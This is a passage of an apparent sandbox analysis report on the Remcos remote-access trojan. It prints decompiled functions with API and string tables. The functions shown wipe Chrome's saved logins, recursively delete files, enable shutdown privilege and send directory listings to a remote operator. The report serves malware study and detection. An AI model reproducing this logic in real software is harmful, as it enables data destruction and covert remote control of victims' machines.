                              • Process32FirstW.KERNEL32(00000000,?), ref: 0040D209
                              • Process32NextW.KERNEL32(0040CC11,0000022C), ref: 0040D27A
                              • CloseHandle.KERNEL32(0040CC11,?,00000000,?,?,?), ref: 0040D287
                              • CreateMutexA.KERNEL32(00000000,00000001,Remcos_Mutex_Inj,00000000), ref: 0040D39D
                              • CloseHandle.KERNEL32(00000000), ref: 0040D3FF
                                • Part of subcall function 00416FD0: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000), ref: 00416FE5
                              Strings
                              Memory Dump Source
                              • Source File: 00000005.00000002.937782591.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.937867942.000000000046F000.00000040.00000001.sdmp
                              Yara matches
                              Similarity
                              • API ID: CloseCreateHandleProcess32$FileFirstModuleMutexNameNextOpenProcessSnapshotToolhelp32
                              • String ID: Inj$Program Files (x86)\$Program Files\$Remcos_Mutex_Inj
                              • API String ID: 193334293-694575909
                              • Opcode ID: 28a638553a22d9f5be275812809799c4db8dcf5cce7f1ff8c7c3ee5921d254a0
                              • Instruction ID: 478cdb67a5d67a03f70ae787e2c2ba94b2730d13673da361e8ab10cc645f79f9
                              • Opcode Fuzzy Hash: 28a638553a22d9f5be275812809799c4db8dcf5cce7f1ff8c7c3ee5921d254a0
                              • Instruction Fuzzy Hash: 51613F30900209AACF14EFA1D9969EE7735AF10349F50417EB816771E2EF386E4ECA59
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 100%
                              			E004170AC(WCHAR* __ecx) {
                              				char _v5;
                              				WCHAR* _v12;
                              				short _v532;
                              				short _v1052;
                              				struct _WIN32_FIND_DATAW _v1644;
                              				signed int _t52;
                              				intOrPtr _t53;
                              				char _t54;
                              				short _t55;
                              				signed int _t56;
                              				intOrPtr _t57;
                              				char _t58;
                              				signed int _t63;
                              				char _t68;
                              				void _t72;
                              				void _t73;
                              				signed int _t78;
                              				signed int _t84;
                              				void* _t86;
                              				intOrPtr* _t89;
                              				signed short* _t90;
                              				void* _t91;
                              				signed int _t95;
                              				void* _t100;
                              				void* _t102;
                              				signed short* _t103;
                              				void* _t106;
                              				void* _t107;
                              				signed int _t108;
                              				intOrPtr* _t110;
                              				void* _t112;
                              				void* _t118;
                              				void* _t120;
                              				void* _t123;
                              				void* _t124;
                              
                              				_v12 = __ecx;
                              				_t103 = __ecx;
                              				_t118 =  &_v1052 - __ecx;
                              				do {
                              					_t52 =  *_t103 & 0x0000ffff;
                              					 *(_t118 + _t103) = _t52;
                              					_t103 =  &(_t103[1]);
                              				} while (_t52 != 0);
                              				_t89 =  &_v1052 - 2;
                              				do {
                              					_t53 =  *((intOrPtr*)(_t89 + 2));
                              					_t89 = _t89 + 2;
                              				} while (_t53 != 0);
                              				_t54 = L"\\*"; // 0x2a005c
                              				 *_t89 = _t54;
                              				_t106 =  &_v532 - __ecx;
                              				_t55 =  *0x465908; // 0x0
                              				 *((short*)(_t89 + 4)) = _t55;
                              				_t90 = __ecx;
                              				do {
                              					_t56 =  *_t90 & 0x0000ffff;
                              					 *(_t106 + _t90) = _t56;
                              					_t90 =  &(_t90[1]);
                              				} while (_t56 != 0);
                              				_t110 =  &_v532 - 2;
                              				do {
                              					_t57 =  *((intOrPtr*)(_t110 + 2));
                              					_t110 = _t110 + 2;
                              				} while (_t57 != 0);
                              				_t58 = "\\"; // 0x5c
                              				 *_t110 = _t58;
                              				_t86 = FindFirstFileW( &_v1052,  &_v1644);
                              				if(_t86 == 0xffffffff) {
                              					L34:
                              					return 0;
                              				}
                              				_t91 = 0;
                              				do {
                              					_t63 =  *(_t123 + _t91 - 0x210) & 0x0000ffff;
                              					_t91 = _t91 + 2;
                              					 *(_t123 + _t91 - 0x41a) = _t63;
                              				} while (_t63 != 0);
                              				_v5 = 1;
                              				do {
                              					if(FindNextFileW(_t86,  &_v1644) == 0) {
                              						if(GetLastError() != 0x12) {
                              							L33:
                              							FindClose(_t86);
                              							goto L34;
                              						}
                              						_t68 = 0;
                              						_v5 = 0;
                              						goto L23;
                              					}
                              					if(E00417036( &(_v1644.cFileName)) != 0) {
                              						L22:
                              						_t68 = _v5;
                              						goto L23;
                              					}
                              					_t107 =  &(_v1644.cFileName);
                              					_t120 = _t107;
                              					do {
                              						_t72 =  *_t107;
                              						_t107 = _t107 + 2;
                              					} while (_t72 != 0);
                              					_t108 = _t107 - _t120;
                              					_t112 =  &_v532 - 2;
                              					do {
                              						_t73 =  *(_t112 + 2);
                              						_t112 = _t112 + 2;
                              					} while (_t73 != 0);
                              					_t95 = _t108 >> 2;
                              					memcpy(_t112, _t120, _t95 << 2);
                              					memcpy(_t120 + _t95 + _t95, _t120, _t108 & 0x00000003);
                              					_t124 = _t124 + 0x18;
                              					if((_v1644.dwFileAttributes & 0x00000010) == 0) {
                              						if((_v1644.dwFileAttributes & 0x00000001) != 0) {
                              							SetFileAttributesW( &_v532, 0x80);
                              						}
                              						if(DeleteFileW( &_v532) == 0) {
                              							goto L33;
                              						} else {
                              							_t100 = 0;
                              							do {
                              								_t78 =  *(_t123 + _t100 - 0x418) & 0x0000ffff;
                              								_t100 = _t100 + 2;
                              								 *(_t123 + _t100 - 0x212) = _t78;
                              							} while (_t78 != 0);
                              							goto L22;
                              						}
                              					}
                              					if(E004170AC( &_v532) == 0) {
                              						goto L33;
                              					}
                              					RemoveDirectoryW( &_v532);
                              					_t102 = 0;
                              					do {
                              						_t84 =  *(_t123 + _t102 - 0x418) & 0x0000ffff;
                              						_t102 = _t102 + 2;
                              						 *(_t123 + _t102 - 0x212) = _t84;
                              					} while (_t84 != 0);
                              					goto L22;
                              					L23:
                              				} while (_t68 != 0);
                              				FindClose(_t86);
                              				return RemoveDirectoryW(_v12);
			}

                              APIs
                              • FindFirstFileW.KERNEL32(?,?,?,0046C518,00000001), ref: 00417143
                              • FindNextFileW.KERNEL32(00000000,?,?,0046C518,00000001), ref: 0041717A
                              • RemoveDirectoryW.KERNEL32(?,?,0046C518,00000001), ref: 004171F4
                              • FindClose.KERNEL32(00000000,?,0046C518,00000001), ref: 00417222
                              • RemoveDirectoryW.KERNEL32(0046C518,?,0046C518,00000001), ref: 0041722B
                              • SetFileAttributesW.KERNEL32(?,00000080,?,0046C518,00000001), ref: 00417248
                              • DeleteFileW.KERNEL32(?,?,0046C518,00000001), ref: 00417255
                              • GetLastError.KERNEL32(?,0046C518,00000001), ref: 0041727D
                              • FindClose.KERNEL32(00000000,?,0046C518,00000001), ref: 00417290
                              Memory Dump Source
                              • Source File: 00000005.00000002.937782591.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.937867942.000000000046F000.00000040.00000001.sdmp
                              Yara matches
                              Similarity
                              • API ID: FileFind$CloseDirectoryRemove$AttributesDeleteErrorFirstLastNext
                              • String ID:
                              • API String ID: 2341273852-0
                              • Opcode ID: 30c9a0a95aa4bf78734a47c826458d57c62751b5d512a52d8cc2ce76a63b2d45
                              • Instruction ID: f55fdd06e51736921a03e431044bfc406960ad07d078f96de4dc955a1c0aff70
                              • Opcode Fuzzy Hash: 30c9a0a95aa4bf78734a47c826458d57c62751b5d512a52d8cc2ce76a63b2d45
                              • Instruction Fuzzy Hash: 4C5105345042198ACF24DF68CC84AFAB7B5BF58305F5045EAE84993251EB359ECBCB98
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 75%
                              			E0040A291(void* __edi, void* __eflags) {
                              				char _v28;
                              				char _v52;
                              				void* __ebx;
                              				void* __ebp;
                              				long _t18;
                              				void* _t20;
                              				void* _t21;
                              				void* _t28;
                              				void* _t31;
                              				void* _t32;
                              
                              				_t35 = __eflags;
                              				_t31 = __edi;
                              				_t30 = E00402064(_t20,  &_v52, E0043919A(_t20, __eflags, "UserProfile"));
                              				E0040530D(_t20,  &_v28, _t7, _t31, _t35, "\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data");
                              				L00401FA7();
                              				if(DeleteFileA(L00401F75( &_v28)) != 0) {
                              					_t28 = _t32 - 0x18;
                              					_push("\n[Chrome StoredLogins found, cleared!]");
                              					goto L6;
                              				} else {
                              					_t18 = GetLastError();
                              					if(_t18 == 0 || _t18 == 1) {
                              						_t28 = _t32 - 0x18;
                              						_push("\n[Chrome StoredLogins not found]");
                              						L6:
                              						E00402064(_t20, _t28);
                              						L0040AA8C(_t20, _t30, __eflags);
                              						_t21 = 1;
                              					} else {
                              						_t21 = 0;
                              					}
                              				}
                              				L00401FA7();
                              				return _t21;
			}

                              APIs
                              • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Login Data), ref: 0040A2CD
                              • GetLastError.KERNEL32 ref: 0040A2D7
                              Strings
                              • \AppData\Local\Google\Chrome\User Data\Default\Login Data, xrefs: 0040A298
                              • [Chrome StoredLogins found, cleared!], xrefs: 0040A2FD
                              • UserProfile, xrefs: 0040A29D
                              • [Chrome StoredLogins not found], xrefs: 0040A2F1
                              Memory Dump Source
                              • Source File: 00000005.00000002.937782591.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.937867942.000000000046F000.00000040.00000001.sdmp
                              Yara matches
                              Similarity
                              • API ID: DeleteErrorFileLast
                              • String ID: [Chrome StoredLogins found, cleared!]$[Chrome StoredLogins not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Login Data
                              • API String ID: 2018770650-1062637481
                              • Opcode ID: 6aee853435ac483f14023e027c3c7d13875ae8ad9aac69c95e16b7da5633f9a1
                              • Instruction ID: 3bbe084eb151dafee0128e30ec1122695afa5e51df6dfb55aa123115758e1eef
                              • Opcode Fuzzy Hash: 6aee853435ac483f14023e027c3c7d13875ae8ad9aac69c95e16b7da5633f9a1
                              • Instruction Fuzzy Hash: DE01F221A803095BCA04BAB5CD1B8AE7724A912305B50027FFC02732E2ED7E491986DF
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 100%
                              			E004132F7() {
                              				void* _v8;
                              				intOrPtr _v12;
                              				struct _TOKEN_PRIVILEGES _v24;
                              
                              				OpenProcessToken(GetCurrentProcess(), 0x28,  &_v8);
                              				LookupPrivilegeValueA(0, "SeShutdownPrivilege",  &(_v24.Privileges));
                              				_v24.PrivilegeCount = 1;
                              				_v12 = 2;
                              				AdjustTokenPrivileges(_v8, 0,  &_v24, 0, 0, 0);
                              				return GetLastError() & 0xffffff00 | _t16 != 0x00000000;
			}

                              APIs
                              • GetCurrentProcess.KERNEL32(00000028,?), ref: 00413304
                              • OpenProcessToken.ADVAPI32(00000000), ref: 0041330B
                              • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 0041331D
                              • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 0041333C
                              • GetLastError.KERNEL32 ref: 00413342
                              Strings
                              Memory Dump Source
                              • Source File: 00000005.00000002.937782591.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.937867942.000000000046F000.00000040.00000001.sdmp
                              Yara matches
                              Similarity
                              • API ID: ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
                              • String ID: SeShutdownPrivilege
                              • API String ID: 3534403312-3733053543
                              • Opcode ID: e8fe39f6d22bf31b9f32ed8a783483683b9b4529cc27f430151640f81076cac5
                              • Instruction ID: 9f46d7e8cb4fae5eef3d6f74a49905a97f95598c6ea8fd14d39892eab67246b1
                              • Opcode Fuzzy Hash: e8fe39f6d22bf31b9f32ed8a783483683b9b4529cc27f430151640f81076cac5
                              • Instruction Fuzzy Hash: B7F03A71801229BBDB10AFA1ED0DEEFBF7CEF05A52F000060B905A2196D6348B14CAA5
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 94%
                              			E0044926C(void* __ecx, signed int _a4, intOrPtr _a8) {
                              				short _v8;
                              				short _t17;
                              				signed int _t18;
                              				signed int _t23;
                              				signed int _t25;
                              				signed int _t26;
                              				signed int _t27;
                              				void* _t30;
                              				void* _t31;
                              				intOrPtr _t32;
                              				intOrPtr _t33;
                              				intOrPtr* _t36;
                              				intOrPtr* _t37;
                              
                              				_push(__ecx);
                              				_t23 = _a4;
                              				if(_t23 == 0) {
                              					L21:
                              					_t12 = _a8 + 8; // 0xfde8fe81
                              					if(GetLocaleInfoW( *_t12, 0x20001004,  &_v8, 2) != 0) {
                              						_t17 = _v8;
                              						if(_t17 == 0) {
                              							_t17 = GetACP();
                              						}
                              						L25:
                              						return _t17;
                              					}
                              					L22:
                              					_t17 = 0;
                              					goto L25;
                              				}
                              				_t18 = 0;
                              				if( *_t23 == 0) {
                              					goto L21;
                              				}
                              				_t36 = 0x459f98;
                              				_t25 = _t23;
                              				while(1) {
                              					_t30 =  *_t25;
                              					if(_t30 !=  *_t36) {
                              						break;
                              					}
                              					if(_t30 == 0) {
                              						L7:
                              						_t26 = _t18;
                              						L9:
                              						if(_t26 == 0) {
                              							goto L21;
                              						}
                              						_t37 = 0x459fa0;
                              						_t27 = _t23;
                              						while(1) {
                              							_t31 =  *_t27;
                              							if(_t31 !=  *_t37) {
                              								break;
                              							}
                              							if(_t31 == 0) {
                              								L17:
                              								if(_t18 != 0) {
                              									_t17 = E0043604F(_t23, _t23);
                              									goto L25;
                              								}
                              								_t8 = _a8 + 8; // 0xfde8fe81
                              								if(GetLocaleInfoW( *_t8, 0x2000000b,  &_v8, 2) == 0) {
                              									goto L22;
                              								}
                              								_t17 = _v8;
                              								goto L25;
                              							}
                              							_t32 =  *((intOrPtr*)(_t27 + 2));
                              							if(_t32 !=  *((intOrPtr*)(_t37 + 2))) {
                              								break;
                              							}
                              							_t27 = _t27 + 4;
                              							_t37 = _t37 + 4;
                              							if(_t32 != 0) {
                              								continue;
                              							}
                              							goto L17;
                              						}
                              						asm("sbb eax, eax");
                              						_t18 = _t18 | 0x00000001;
                              						goto L17;
                              					}
                              					_t33 =  *((intOrPtr*)(_t25 + 2));
                              					if(_t33 !=  *((intOrPtr*)(_t36 + 2))) {
                              						break;
                              					}
                              					_t25 = _t25 + 4;
                              					_t36 = _t36 + 4;
                              					if(_t33 != 0) {
                              						continue;
                              					}
                              					goto L7;
                              				}
                              				asm("sbb edx, edx");
                              				_t26 = _t25 | 0x00000001;
                              				goto L9;
			}

                              APIs
                              • GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,0044958B,?,00000000), ref: 00449305
                              • GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,0044958B,?,00000000), ref: 0044932E
                              • GetACP.KERNEL32(?,?,0044958B,?,00000000), ref: 00449343
                              Strings
                              Memory Dump Source
                              • Source File: 00000005.00000002.937782591.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.937867942.000000000046F000.00000040.00000001.sdmp
                              Yara matches
                              Similarity
                              • API ID: InfoLocale
                              • String ID: ACP$OCP
                              • API String ID: 2299586839-711371036
                              • Opcode ID: 46287128e20fa306cd593820d674ce5555d7ecb4dfbfa4eea6010efed54f43df
                              • Instruction ID: 570c54974e689fd34d1e6bcab7248841df2efce4c8a6e9186f0595708dde5153
                              • Opcode Fuzzy Hash: 46287128e20fa306cd593820d674ce5555d7ecb4dfbfa4eea6010efed54f43df
                              • Instruction Fuzzy Hash: C1212822600101BBFB30CF64C802A9773A6FF59F55B568866ED09D7341E776DD01E398
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,0043C9B0,?,00000004), ref: 004410BC
                              Strings
                              Memory Dump Source
                              • Source File: 00000005.00000002.937782591.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.937867942.000000000046F000.00000040.00000001.sdmp
                              Yara matches
                              Similarity
                              • API ID: InfoLocale
                              • String ID: GetLocaleInfoEx$@
                              • API String ID: 2299586839-3007343520
                              • Opcode ID: e28a724808ccbae7fec18c7bc115137aef7f827691145524245741caf7b7c823
                              • Instruction ID: a7f704755b5d2e67fe8756e3b063992e3f12ebeeb1607a3b83353fcb2a10ec15
                              • Opcode Fuzzy Hash: e28a724808ccbae7fec18c7bc115137aef7f827691145524245741caf7b7c823
                              • Instruction Fuzzy Hash: ADF02B31700208FBDB116F61DC02F6F7B60EF44B01F50412AFC05272A2DB798D649A9E
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • GetSystemTimeAsFileTime.KERNEL32(00000000,00435084), ref: 00441112
                              Strings
                              Memory Dump Source
                              • Source File: 00000005.00000002.937782591.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.937867942.000000000046F000.00000040.00000001.sdmp
                              Yara matches
                              Similarity
                              • API ID: Time$FileSystem
                              • String ID: GetSystemTimePreciseAsFileTime$@
                              • API String ID: 2086374402-2730348301
                              • Opcode ID: 725ffb0da7229b128c7fa3089461aada825b446c50f7b3826ff879ece796b463
                              • Instruction ID: 905004eebb46221c2d070f6dd192413a4baa945a661a41a47a192c014b97a96b
                              • Opcode Fuzzy Hash: 725ffb0da7229b128c7fa3089461aada825b446c50f7b3826ff879ece796b463
                              • Instruction Fuzzy Hash: 99E05531B40218F787116F24AC0293FBB60DB88B13B10027AFC0517293D9384E049AEE
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 76%
                              			E004360A3(intOrPtr __ebx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                              				char _v0;
                              				signed int _v8;
                              				intOrPtr _v524;
                              				intOrPtr _v528;
                              				void* _v532;
                              				intOrPtr _v536;
                              				char _v540;
                              				intOrPtr _v544;
                              				intOrPtr _v548;
                              				intOrPtr _v552;
                              				intOrPtr _v556;
                              				intOrPtr _v560;
                              				intOrPtr _v564;
                              				intOrPtr _v568;
                              				intOrPtr _v572;
                              				intOrPtr _v576;
                              				intOrPtr _v580;
                              				intOrPtr _v584;
                              				char _v724;
                              				intOrPtr _v792;
                              				intOrPtr _v800;
                              				char _v804;
                              				struct _EXCEPTION_POINTERS _v812;
                              				signed int _t40;
                              				char* _t47;
                              				char* _t49;
                              				intOrPtr _t61;
                              				intOrPtr _t62;
                              				intOrPtr _t66;
                              				intOrPtr _t67;
                              				int _t68;
                              				intOrPtr _t69;
                              				signed int _t70;
                              
                              				_t69 = __esi;
                              				_t67 = __edi;
                              				_t66 = __edx;
                              				_t61 = __ebx;
                              				_t40 =  *0x46a00c; // 0x7df2b874
                              				_t41 = _t40 ^ _t70;
                              				_v8 = _t40 ^ _t70;
                              				if(_a4 != 0xffffffff) {
                              					_push(_a4);
                              					E0042F21A(_t41);
                              					_pop(_t62);
                              				}
                              				L00431810(_t67,  &_v804, 0, 0x50);
                              				L00431810(_t67,  &_v724, 0, 0x2cc);
                              				_v812.ExceptionRecord =  &_v804;
                              				_t47 =  &_v724;
                              				_v812.ContextRecord = _t47;
                              				_v548 = _t47;
                              				_v552 = _t62;
                              				_v556 = _t66;
                              				_v560 = _t61;
                              				_v564 = _t69;
                              				_v568 = _t67;
                              				_v524 = ss;
                              				_v536 = cs;
                              				_v572 = ds;
                              				_v576 = es;
                              				_v580 = fs;
                              				_v584 = gs;
                              				asm("pushfd");
                              				_pop( *_t22);
                              				_v540 = _v0;
                              				_t49 =  &_v0;
                              				_v528 = _t49;
                              				_v724 = 0x10001;
                              				_v544 =  *((intOrPtr*)(_t49 - 4));
                              				_v804 = _a8;
                              				_v800 = _a12;
                              				_v792 = _v0;
                              				_t68 = IsDebuggerPresent();
                              				SetUnhandledExceptionFilter(0);
                              				if(UnhandledExceptionFilter( &_v812) == 0 && _t68 == 0 && _a4 != 0xffffffff) {
                              					_push(_a4);
                              					E0042F21A(_t57);
                              				}
                              				return L0042F61B(_v8 ^ _t70);
                              			}

                              Instruction addresses (side-by-side column from the report): 0x004360a3 to 0x004361dd


                              APIs
                              • IsDebuggerPresent.KERNEL32 ref: 0043619B
                              • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 004361A5
                              • UnhandledExceptionFilter.KERNEL32(?), ref: 004361B2
                              Memory Dump Source
                              • Source File: 00000005.00000002.937782591.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000005.00000002.937867942.000000000046F000.00000040.00000001.sdmp
                              Yara matches
                              Similarity
                              • API ID: ExceptionFilterUnhandled$DebuggerPresent
                              • String ID:
                              • API String ID: 3906539128-0
                              • Opcode ID: 6a5391929d803bd455df93c3db7eef3c223850fa911d3d5d63c768744e45724f
                              • Instruction ID: 9cb4660ce58b979cd107c23742a1d206b3c76e673fdfde5e893b08115a718fab
                              • Opcode Fuzzy Hash: 6a5391929d803bd455df93c3db7eef3c223850fa911d3d5d63c768744e45724f
                              • Instruction Fuzzy Hash: 3531057490122DABCB21DF65DC8979DBBB8BF08310F5081EAE40CA7261E7349F858F58
                              Uniqueness
                              Uniqueness Score: -1.00%

                              C-Code - Quality: 82%
                              			// Decompiler output. Enumerates a directory with FindFirstFileW/FindNextFileW, builds an
                              			// entry string per hit and passes it to L00404A6E with a command byte (0x50 on success,
                              			// 0x54 when FindFirstFileW fails). The APIs list below shows that L00404A6E calls send
                              			// (WS2_32), so the listing is returned over the network socket: directory enumeration
                              			// on behalf of a remote operator, consistent with the RAT verdict in this report.
                              			E00406176(char _a4) {
                              				char _v28;
                              				char _v52;
                              				char _v76;
                              				struct _WIN32_FIND_DATAW _v668;
                              				void* __ebx;
                              				void* __esi;
                              				int _t29;
                              				void* _t34;
                              				void* _t49;
                              				void* _t73;
                              				void* _t74;
                              
                              				_t73 = FindFirstFileW(L00401ECB( &_a4),  &_v668);
                              				_t77 = _t73 - 0xffffffff;
                              				if(_t73 != 0xffffffff) {
                              					E004020B5(_t49,  &_v28);
                              					E0040425F(_t49,  &_v52,  &(_v668.cFileName));
                              					_t71 = ".";
                              					_t29 = L004074E6(__eflags);
                              					_t50 = _t29;
                              					L00401ED0();
                              					__eflags = _t29;
                              					if(__eflags != 0) {
                              						L00401FB1( &_v28, ".", _t73, E0040208B(_t50,  &_v52, ".", __eflags,  &_v668, 0x250));
                              						L5:
                              						L00401FA7();
                              					}
                              					__eflags = FindNextFileW(_t73,  &_v668);
                              					if(__eflags != 0) {
                              						_t34 = E0040208B(_t50,  &_v76, _t71, __eflags,  &_v668, 0x250);
                              						_t71 =  &_v28;
                              						L00401FB1( &_v28,  &_v28, _t73, L004074F2(_t50,  &_v52,  &_v28, __eflags, _t34));
                              						L00401FA7();
                              						goto L5;
                              					}
                              					E004020CC(_t50, _t74 - 0x18, _t71, __eflags,  &_v28);
                              					_push(0x50);
                              					L00404A6E(_t50, 0x46c2e8, _t71, __eflags);
                              					L00401FA7();
                              				} else {
                              					L00416CF4(_t49, _t74 - 0x18,  &_a4);
                              					_push(0x54);
                              					L00404A6E(_t49, 0x46c2e8,  &_a4, _t77);
                              				}
                              				return L00401ED0();
                              			}

                              Instruction addresses (side-by-side column from the report): 0x00406197 to 0x0040628a


                              APIs
                              • FindFirstFileW.KERNEL32(00000000,?), ref: 00406191
                              • FindNextFileW.KERNEL32(00000000,?,?), ref: 00406251
                                • Part of subcall function 00404A6E: send.WS2_32(?,00000000,00000000,00000000), ref: 00404AE2
                              Memory Dump Source
                              • Source File: 00000005.00000002.937782591.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000005.00000002.937867942.000000000046F000.00000040.00000001.sdmp
                              Yara matches
                              Similarity
                              • API ID: FileFind$FirstNextsend
                              • String ID:
                              • API String ID: 4113138495-0
                              • Opcode ID: 2eb6fcb89c8de4bfe866411cf2b728d7e90f918973601a23097cebf8dd26e74c
                              • Instruction ID: da5cdc510f7b1e2dc041b682181fa273f481cbbb57d68fa438c846ee03cac76e
                              • Opcode Fuzzy Hash: 2eb6fcb89c8de4bfe866411cf2b728d7e90f918973601a23097cebf8dd26e74c
                              • Instruction Fuzzy Hash: CD2141719101195ACB14FBA5CC96DEEB738AF51304F40027FF906761D1EF385A498A99
                              Uniqueness
                              Uniqueness Score: -1.00%

                              C-Code - Quality: 96%
                              			// Decompiler output. Analyst note (inference from the constants, not a report finding):
                              			// this is a SHA-256 compression function. Evidence: the inline constants 0x428a2f98,
                              			// 0x71374491, 0xb5c0fbcf, 0xe9b5dba5, ... are the SHA-256 round constants K[0..7]; the
                              			// 16-word block copy followed by a 0x30 (48) iteration loop implements the message
                              			// schedule W[i] = s1(W[i-2]) + W[i-7] + s0(W[i-15]) + W[i-16] with L0042DF6A acting as a
                              			// 32-bit rotate-right (rotations 17,19 with >>10 and 7,18 with >>3); the main loop runs
                              			// eight unrolled rounds per pass until _v40 reaches 0x100 (64 rounds) using the round
                              			// functions Sigma1 (6,11,25), Ch, Sigma0 (2,13,22) and Maj; the final SSE loop adds the
                              			// eight working variables back into the state. __ecx points at the 8-word hash state,
                              			// __edx at the 64-byte message block.
                              			E0042E02D(void* __ecx, void* __edx) {
                              				signed int _v8;
                              				signed int _v12;
                              				signed int _v16;
                              				signed int _v20;
                              				signed int _v24;
                              				signed int _v28;
                              				signed int _v32;
                              				signed int _v36;
                              				signed int _v40;
                              				signed int _v44;
                              				signed int _v48;
                              				signed int _v52;
                              				signed int _v56;
                              				signed int _v60;
                              				signed int _v64;
                              				signed int _v68;
                              				void _v72;
                              				void* _v76;
                              				void* _v276;
                              				void _v332;
                              				void* _t204;
                              				signed int _t205;
                              				signed int _t206;
                              				signed int _t207;
                              				signed int _t208;
                              				signed int _t209;
                              				signed int _t213;
                              				signed int _t214;
                              				signed int _t215;
                              				signed int _t217;
                              				signed int _t218;
                              				signed int _t219;
                              				signed int _t222;
                              				signed int _t223;
                              				signed int _t224;
                              				signed int _t226;
                              				signed int _t227;
                              				signed int _t228;
                              				signed int _t231;
                              				signed int _t232;
                              				signed int _t233;
                              				signed int _t235;
                              				signed int _t236;
                              				signed int _t237;
                              				signed int _t240;
                              				signed int _t241;
                              				signed int _t242;
                              				signed int _t244;
                              				signed int _t245;
                              				signed int _t246;
                              				signed int _t249;
                              				signed int _t250;
                              				signed int _t251;
                              				signed int _t254;
                              				signed int _t255;
                              				signed int _t256;
                              				signed int _t260;
                              				signed int _t261;
                              				signed int _t262;
                              				signed int _t265;
                              				signed int _t266;
                              				signed int _t267;
                              				signed int _t271;
                              				signed int _t272;
                              				signed int _t273;
                              				signed int _t276;
                              				signed int _t277;
                              				signed int _t278;
                              				signed int _t282;
                              				signed int _t283;
                              				signed int _t284;
                              				signed int _t287;
                              				signed int _t288;
                              				signed int _t289;
                              				signed int _t294;
                              				intOrPtr _t295;
                              				unsigned int _t297;
                              				void* _t299;
                              				signed int _t301;
                              				void* _t400;
                              				void* _t401;
                              				void* _t402;
                              				void* _t403;
                              				void* _t404;
                              				void* _t405;
                              				void* _t406;
                              				void* _t407;
                              				void* _t408;
                              				void* _t409;
                              				void* _t411;
                              				void* _t412;
                              				void* _t413;
                              				void* _t414;
                              				void* _t415;
                              				void* _t422;
                              				void* _t423;
                              				void* _t424;
                              				void* _t425;
                              				void* _t426;
                              				void* _t433;
                              				void* _t434;
                              				void* _t435;
                              				void* _t436;
                              				void* _t437;
                              				void* _t444;
                              				void* _t445;
                              				void* _t446;
                              				void* _t447;
                              				void* _t448;
                              				signed int _t454;
                              				void* _t455;
                              				void* _t456;
                              				void* _t457;
                              				void* _t458;
                              				void* _t459;
                              				signed int _t465;
                              				void* _t466;
                              				void* _t467;
                              				void* _t468;
                              				void* _t469;
                              				void* _t470;
                              				signed int _t476;
                              				void* _t477;
                              				void* _t478;
                              				void* _t479;
                              				void* _t480;
                              				void* _t481;
                              				signed int _t487;
                              				void* _t506;
                              				void* _t513;
                              				void* _t520;
                              				void* _t527;
                              				void* _t534;
                              				void* _t541;
                              				void* _t548;
                              				void* _t555;
                              				unsigned int _t558;
                              				signed int _t563;
                              				signed int _t568;
                              				signed int _t573;
                              				signed int _t578;
                              				signed int _t583;
                              				signed int _t588;
                              				signed int _t593;
                              				signed int _t598;
                              				void* _t603;
                              
                              				_t400 = __edx;
                              				_v12 = 0x30;
                              				_t301 = 8;
                              				_v76 = __ecx;
                              				memcpy( &_v72, __ecx, _t301 << 2);
                              				_push(0x10);
                              				_t204 = memcpy( &_v332, _t400, 0 << 2);
                              				_v40 = _t204;
                              				do {
                              					_t558 =  *_t204;
                              					_t297 =  *(_t204 - 0x34);
                              					_t401 = 0x13;
                              					_t205 = L0042DF6A(_t558, _t401);
                              					_t402 = 0x11;
                              					_t206 = L0042DF6A(_t558, _t402);
                              					_t403 = 0x12;
                              					_t207 = L0042DF6A(_t297, _t403);
                              					_t404 = 7;
                              					_t208 = L0042DF6A(_t297, _t404);
                              					_t209 = _v40;
                              					 *((intOrPtr*)(_t209 + 8)) = (_t205 ^ _t206 ^ _t558 >> 0x0000000a) + (_t207 ^ _t208 ^ _t297 >> 0x00000003) +  *((intOrPtr*)(_t209 - 0x38)) +  *((intOrPtr*)(_t209 - 0x14));
                              					_t204 = _t209 + 4;
                              					_t14 =  &_v12;
                              					 *_t14 = _v12 - 1;
                              					_v40 = _t204;
                              				} while ( *_t14 != 0);
                              				_v40 = _v40 & 0x00000000;
                              				_t563 = _v44;
                              				_v32 = _v60;
                              				_v20 = _v48;
                              				_v24 = _v64;
                              				_v16 = _v52;
                              				_t212 = _v56;
                              				_v28 = _v68;
                              				_t299 = 2;
                              				_v8 = _v56;
                              				_v36 = _v72;
                              				do {
